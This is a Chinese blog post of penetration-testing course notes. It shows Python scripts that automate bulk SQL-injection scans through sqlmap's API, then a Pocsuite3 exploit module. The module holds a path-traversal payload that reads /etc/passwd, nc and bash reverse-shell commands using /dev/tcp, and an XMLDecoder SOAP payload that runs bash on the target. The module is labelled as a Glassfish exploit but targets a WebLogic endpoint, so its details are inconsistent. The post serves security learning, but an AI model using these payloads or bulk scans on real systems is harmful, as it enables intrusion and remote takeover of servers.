第79天-Python 开发-sqlmapapi&Tamper&Pocsuite

最新推荐文章于 2024-04-07 09:37:03 发布
最新推荐文章于 2024-04-07 09:37:03 发布
阅读量610 收藏 3
点赞数
分类专栏: 2020小迪安全—渗透测试学习笔记 文章标签: python 爬虫 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/124482564
版权

思维导图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-D40diM1S-1651147770779)(image79/79.png)]

知识点

本课知识点:
Request 爬虫技术,Sqlmap 深入分析,Pocsuite 分析,框架代码二次修改等

目的

掌握安全工具的 API 接口开发利用,掌握优秀框架的二次开发插件引用等

演示案例:

Sqlmap_Tamper 模块脚本编写绕过滤

SqlmapAPI 调用实现自动化 SQL 注入安全检测

参考文章

https://www.freebuf.com/articles/web/204875.html

应用案例:前期通过信息收集拿到大量的URL地址,这个时候可以配合SqlmapAPI接口进行批量的SQL注入检测(SRC 挖掘)

开发当前项目过程:(利用 sqlmapapi 接口实现批量 URL 注入安全检测)
1.创建新任务记录任务 ID @get("/task/new")
2.设置任务 ID 扫描信息 @post("/option/<taskid>/set ")
3.开始扫描对应 ID 任务 @post("/scan/<taskid>/start")
4.读取扫描状态判断结果 @get("/scan/<taskid>/status")
5.如果结束删除 ID 并获取结果 @get("/task/<taskid>/delete")
6.扫描结果查看@get("/scan/<taskid>/data")
基础demo
import requests
import json

# 创建任务id
task_new_url='http://127.0.0.1:8775/task/new'
resp= requests.get(task_new_url)
task_id=resp.json()['taskid']
print(task_id)

# 设置任务id的配置信息(扫描信息)
data ={
    'url':'http://127.0.0.1/sqli-labs-master/Less-2/?id=1'
}
headers={
    'Content-Type':'application/json'
}
task_set_url='http://127.0.0.1:8775/option/'+task_id+'/set'
print(task_set_url)
task_set_resp=requests.post(task_set_url,data=json.dumps(data),headers=headers)
print(task_set_resp.json())

# 开始扫描对应 ID 任务
task_scan_url='http://127.0.0.1:8775/scan/'+task_id+'/start'
print(task_scan_url)
task_scan_resp=requests.post(task_scan_url,data=json.dumps(data),headers=headers)
print(task_scan_resp.json())

# 读取扫描状态判断结果
task_scan_status_url='http://127.0.0.1:8775/scan/'+task_id+'/status'
print(task_scan_status_url)
task_scan_status_resp=requests.get(task_scan_status_url)
print(task_scan_status_resp.json())

# 如果结束删除 ID 并获取结果
# 扫描结果查看

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-caN2Ri80-1651147770780)(image79/79-2.png)]

自动化SQL注入检测脚本
import time
import requests
import json

def sqlmapapi(url):
    data = {
        'url':url
    }
    headers = {
        'Content-Type': 'application/json'
    }
    # 1-创建任务id
    task_new_url = 'http://127.0.0.1:8775/task/new'
    resp = requests.get(task_new_url)
    task_id = resp.json()['taskid']
    print('创建任务id')
    # print(task_id)
    if 'success' in resp.json():
        print('创建任务id 成功!')
        # 2-设置任务id的配置信息(扫描信息)
        task_set_url = 'http://127.0.0.1:8775/option/' + task_id + '/set'
        print('设置任务id的配置信息')
        # print(task_set_url)
        task_set_resp = requests.post(task_set_url, data=json.dumps(data), headers=headers)
        # print(task_set_resp.json())
        if  'success' in task_set_resp.json():
            print('设置任务id的配置信息成功!')
            # 3-开始扫描对应 ID 任务
            task_scan_url = 'http://127.0.0.1:8775/scan/' + task_id + '/start'
            print('开始扫描对应 ID 任务')
            # print(task_scan_url)
            task_scan_resp = requests.post(task_scan_url, data=json.dumps(data), headers=headers)
            # print(task_scan_resp.json())
            if 'success' in task_scan_resp.json():
                print('开始扫描对应成功 ')
                while 1:
                    # 4-读取扫描状态判断结果
                    task_scan_status_url = 'http://127.0.0.1:8775/scan/' + task_id + '/status'
                    print('读取扫描状态判')
                    # print(task_scan_status_url)
                    task_scan_status_resp = requests.get(task_scan_status_url)
                    # print(task_scan_status_resp.json())
                    if 'running' in task_scan_status_resp.content.decode('utf-8'):
                        print('task scn is running ')
                        pass

                    else:
                        print('sqlmapapi scan finished')
                        # 扫描结果保存
                        task_scan_data_url='http://127.0.0.1:8775/scan/' + task_id + '/data'
                        task_scan_data_url_resp=requests.get(task_scan_data_url).content.decode('utf-8')
                        task_scan_data=task_scan_data_url_resp
                        with open(r'results.txt','a+') as f:
                            f.write(url+'\n')
                            f.write(task_scan_data+'\n')
                            f.write('==========python sqlmapapi scan result=========' + '\n')
                            f.close()
                            # 删除任务id
                            scan_deltask_url='http://127.0.0.1:8775/task/' + task_id + '/delete'
                            scan_deltask = requests.get(scan_deltask_url)
                            if 'success' in scan_deltask.content.decode('utf-8'):
                                print('删除任务id成功')
                                break
                    # 设置读取状态时间
                    time.sleep(1)


if __name__ == '__main__':
    print('task_running')
    for url in open('url.txt'):
        url = url.replace('\n', '')
        sqlmapapi(url)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zSy1I4NC-1651147770781)(image79/79-3.png)]

Pocsuite3 漏扫框架二次开发 POC/EXP 引入使用

(二次开发,构成自己的poc/exp库)

参考:https://www.freebuf.com/articles/people/162868.html

开发当前项目过程:(利用已知框架增加引入最新或内部的 EXP 进行安全检测)
1.熟悉 Pocsuite3 项目使用及介绍
2.熟悉使用命令及代码文件对应情况
3.选取 Glassfish 漏洞进行编写测试
4.参考自带漏洞模版代码模仿写法测试
python cli.py -u xx.xx.xx.xx -r Glassfish.py --verify

安装好Pocsuite3-master项目

运行poc

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vgciGNyu-1651147770781)(image79/79-4.png)]

glassfish_poc
"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""

import re
from collections import OrderedDict
from urllib.parse import urljoin

from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = '97009'  # ssvid
    version = '3.0'
    author = ['xiaodi']
    vulDate = '2020-12-22'
    createDate = '2020-12-22'
    updateDate = '2020-12-22'
    references = ['https://www.xiaodi8.com']
    name = 'Glassfish任意文件读取漏洞'
    appPowerLink = ''
    appName = 'Glassfish'
    appVersion = '< 10.3.6'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        Glassfish任意文件读取漏洞将导致敏感数据泄露,进一步利用会造成权限丢失等安全隐患!
    '''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": "rm -f /tmp/p;mknod /tmp/p p &amp;&amp; nc {0} {1} 0/tmp/p",
            "bash": "bash -i &gt;&amp; /dev/tcp/{0}/{1} 0&gt;&amp;1",
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o

    def get_check_payload(self, lhost, lport, random_uri):
        check_payload = '''
            <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
              <soapenv:Header>
                <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                  <java version="1.8" class="java.beans.XMLDecoder">
                    <object id="url" class="java.net.URL">
                      <string>http://{lhost}:{lport}/{random_uri}</string>
                    </object>
                    <object idref="url">
                      <void id="stream" method = "openStream" />
                    </object>
                  </java>
                </work:WorkContext>
                </soapenv:Header>
              <soapenv:Body/>
            </soapenv:Envelope>
        '''

        return check_payload.format(
            lhost=lhost, lport=lport, random_uri=random_uri)

    def _verify(self):
        result={}
        veri_url=self.url
        payload='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
        try:
            #requests.post(veri_url, data=payload, headers=headers)
            resp = requests.get(veri_url+payload)
            print(resp.status_code)
            #pattern = 'http://{0}(:{1})?/{2}'.format(check_host, check_port, random_uri)

            if resp.status_code==200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
                pass
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        return self._verify()

    def get_shell_payload(self, cmd_base, cmd_opt, cmd_payload):
        shell_payload = '''
            <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
              <soapenv:Header>
                <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                  <java>
                    <object class="java.lang.ProcessBuilder">
                      <array class="java.lang.String" length="3" >
                        <void index="0">
                          <string>{cmd_base}</string>
                        </void>
                        <void index="1">
                          <string>{cmd_opt}</string>
                        </void>
                        <void index="2">
                          <string>{cmd_payload}</string>
                        </void>
                      </array>
                      <void method="start"/>
                    </object>
                  </java>
                </work:WorkContext>
              </soapenv:Header>
              <soapenv:Body/>
            </soapenv:Envelope>
        '''
        return shell_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt,
                                    cmd_payload=cmd_payload)

    def _shell(self):
        vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
        cmd = 'bash -i &gt;&amp; /dev/tcp/{0}/{1} 0&gt;&amp;1'.format(
            get_listener_ip(), get_listener_port())
        shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd)
        headers = {
            "Content-Type": "text/xml;charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        }

        try:
            requests.post(vul_url, data=shell_payload, headers=headers)
        except Exception as e:
            logger.warn(str(e))

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)

涉及资源:

http://sqlmap.org/
https://github.com/knownsec/pocsuite/
https://www.freebuf.com/articles/web/204875.html
https://www.freebuf.com/articles/people/162868.html
https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ 提取码:xiao

IsecNoob
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
第79天:Python开发-sqlmapapi&Tamper&Pocsuite1
08-03
1.创建新任务记录任务 ID 2.设置任务 ID 扫描信息 3.开始扫描对应 ID 任务 4.读取扫描状态判断结果 5.如果结束删除 ID 并获取结果 1.熟悉
Python 渗透测试:利用SQLmap API接口进行批量的SQL注入检测.(SRC挖掘)
网络安全领域___专研者.
05-24 7281
Python 开发学习的意义: (1)学习相关安全工具原理. (2)掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况. (3)在二次开发 Bypass,日常任务,批量测试利用等方面均有帮助.
p79 Python 开发-sqlmapapi&Tamper&Pocsuite(含安全狗的安装与开启网站防护)
weixin_43263566的博客
03-10 1097
Python 开发-sqlmapapi&Tamper&Pocsuite
探索 SQLMapAPI_PI:自动化SQL注入神器
最新发布
gitblog_00024的博客
04-07 364
探索 SQLMapAPI_PI:自动化SQL注入神器 项目地址:https://gitcode.com/sowish/sqlmapapi_pi 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过构造恶意SQL语句来获取、修改或者删除数据库中的敏感信息。为了帮助安全研究人员和开发人员检测并防止这类漏洞,sqlmapapi_pi 应运而生。这是一个基于 Python 的 SQLMap ...
Xpocsutie3:基于pocsuite3二次修改的POC检测框架
寒星的博客
06-11 1397
简介 Xpocsutie3是在pocsuite3的基础上进行二次修改的一个POC检测框架。 pocsuite3是我之前最主要的poc检测框架,后来也被我作为一个poc检测模块的核心集成到了我的资产管理平台。但是随着持续使用中,发现其还是有一些不足,比如在编写poc时特别繁琐,在应对一些特殊场景时不够灵活等问题。 不过也随着对pocsuite3的整体框架了解越来越深,发现其扩展性很强,完全可以根据自己的一些习惯进行进一步优化,使其发挥更大的作用,Xpocsutie3便由此而生。 特点 兼容原版poc 目前由.
【网络安全 | 渗透工具】SQLmap精讲(全网最详细图文教程)
等风来
01-06 9589
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。留言板项目SQLmap渗透实例 | CSDN@秋说本文以目标账号与其它进行讲解。
python调用sqlmapapi实现批量扫描网站
weixin_43996007的博客
02-22 4157
python调用sqlmapapi实现批量扫描网站 1、介绍 众所周知,sqlmap是一个非常强大的注入扫描工具。利用它可以自动化检测和利用SQL注入缺陷以达到接管控制网站后台数据库的目的。 但是再强大的工具总会存在一些缺陷的地方——比如每进行一个扫描任务,都需要再次开启一个命令行;使用相同的参数扫描网站时需要多次输入,浪费时间,效率低下。不过好在sqlmap提供了一个强大的api可以弥补这些缺陷。 sqlmapapi分为服务端和客户端,默认端口为8775。使用方法如下: 其中,-p参数可以指定端口号,-
sqlmap-tamper说明大全
10-03
本文档主要说明sqlmap的tamper使用情况以及主要使用方法,很全的说明文档。
1、Sqlmap Tamper脚本编写介绍-01
09-15
Sqlmap Tamper脚本编写介绍 Sqlmap Tamper脚本是对Sqlmap工具的扩展,主要功能是对原本的payload进行特定的更改以绕过WAF。Tamper脚本结构主要包括三个部分:Tamper脚本结构介绍、Tamper函数介绍和dependencies函数...
SQLMapAPI介绍与实践(一)
03-25
SQLMap已经成为我们做渗透测试不可缺少的工具,在这里就不在描述工具的使用,在...无论是哪种方式测试效率都是单兵作战,SQLMap的开发人员早已想到了这个问题,所以预留了扫描接口,也就是我们接下来要讲的SQLMapAPI。
SQLMap之Tamper.docx
09-26
SQLMap之Tamper SQLMap 是一个功能强大的 SQL 注入攻击工具,它提供了 tamper 脚本来帮助攻击者绕过应用程序的敏感字符过滤和 WAF 规则的阻挡,从而进行渗透攻击。tamper 脚本可以在一定程度上避开应用程序的敏感...
SQLMap API编程
03-01
ibatis相关的几个包 博文链接:https://imticg.iteye.com/blog/216840
Python安全开发----sqlmap api&Tamper&Pocsuite框架
qi_SJQ_的博客
02-25 823
1.知识: 知识点: Request 爬虫技术,Sqlmap api 深入分析,Pocsuite 分析,框架代码二次修改等。 目的: 掌握安全工具的 API 接口开发利用,掌握优秀框架的二次开发插件引用等。 2.Sqlmap API 调用实现自动化 SQL 注入安全检测: 参考自:https://www.freebuf.com/articles/web/204875.html 流程: 1.创建新任务记录任务 ID :@get("/task/new") 2.设置任务 ID 扫描信息: @post(".
SqlmapAPI调用实现自动化SQL注入安全检测
过期的秋刀鱼
11-29 1144
应用案例:前期通过信息收集拿到大量的URL地址,这个时候可以配置sqlmapAP接口进行批量的SQL注入检测 (SRC挖掘)上述代码,在每运行一次都会创建一个任务ID,所以需要进行代码优化。查看扫描结果是get请求,所以可以在浏览器中查看结果。这边任务id和上面不一样是因为我重启了服务。查看sqlmapapi使用方法。
sqlmap之sqlmapapi
十五年游戏主程转渗透之路
04-12 5803
sqlmapapi,,sqlmapapi二次封装原理和实操
python实现sqlmapapi调用实现批量
qq_46540840的博客
08-25 928
环境 sqlmap是可以被python调用的 首先在cmd中输入 python sqlmapapi.py -s 创建用python 对其连接 import requests url='http://127.0.0.1:8775/task/new' res1= requests.get(url) print(res1.content.decode('utf-8')) 设置任务Id扫描信息 set_url= 'http://127.0.0.1:8775/option/'+taskId+'/set' re
PocSuite 工具使用介绍和sqlmap工具使用介绍
qq_42430287的博客
07-01 474
PocSuite 工具使用介绍和sqlmap工具使用介绍
sqlmap工具的使用 (超详细附工具版)
读书 买花 长大
06-11 3036
sqlmap
python使用sqlmap API检测SQL注入
weixin_30608503的博客
05-26 264
0x00前言: 大家都知道sqlmap是非常强大的sql注入工具,最近发现他有个sqlmap API,上网查了一下。发现这是 sqlmap的微端。(可以叫做sqlmap在线检测sql注入= =) 0x001准备: 环境: Ubuntu 16.04 Python3 Python2 用到的库:requests,parform,os 0x002正文: 首先我们来启动sqlmap...
SQLmap的--tamper命令怎么用
06-10
SQLmap的--tamper选项用于指定一个或多个自定义的字符串操作函数,用于绕过目标网站的WAF。这些函数将在SQLmap尝试注入参数时应用于HTTP请求,以使注入载荷更难以检测和阻止。 以下是一个例子: ``` sqlmap -u "http://example.com/?id=1" --tamper=space2comment ``` 在这个例子中,--tamper选项指定了一个名为space2comment的字符串操作函数,它将空格字符(" ")转换为注释("--")字符。这将使SQLmap生成的注入载荷更复杂,以绕过目标网站的WAF。 您可以使用多个字符串操作函数来增加绕过目标网站的WAF的成功率。例如: ``` sqlmap -u "http://example.com/?id=1" --tamper=space2comment,randomcase ``` 在这个例子中,--tamper选项指定了两个字符串操作函数,分别是space2comment和randomcase。space2comment函数将空格字符转换为注释字符,randomcase函数将字符的大小写随机化,从而生成更复杂的注入载荷。 您可以使用--tamper-list选项来列出所有可用的字符串操作函数。例如: ``` sqlmap --tamper-list ``` 这将列出所有可用的字符串操作函数及其用法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值